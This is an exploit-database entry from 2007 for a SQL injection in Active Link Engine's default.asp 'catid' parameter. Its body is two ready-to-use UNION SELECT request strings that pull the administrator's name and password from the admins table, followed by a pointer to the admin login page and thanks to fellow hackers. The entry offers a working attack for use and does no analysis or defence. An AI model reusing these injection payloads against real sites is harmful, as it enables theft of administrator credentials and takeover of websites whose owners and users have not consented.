# Title: Active Link Engine (default.asp catid) Remote SQL Injection Vulnerability
# EDB-ID: 3534
# CVE-ID: (2007-1630)
# OSVDB-ID: (34364)
# Author: CyberGhost
# Published: 2007-03-21
# Verified: yes
# Download Exploit Code
# Download N/A
#Title : Active Link Engine Remote SQL Injection Vulnerability #Author : CyberGhost #My Web Site : http://aspspider.org/cgsecurity #Demo Page : http://www.activewebsoftwares.com/demoactivelinkengine #Script Page : http://www.activewebsoftwares.com/productinfo.aspx?ProductID=7 #Vuln. #Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid%20=%201 #Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid%20=%201 #Admin Login : /admin.asp ==================================== Thanx : redLine - Hackinger - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3 And All TURKISH HACKERS ! # milw0rm.com [2007-03-21]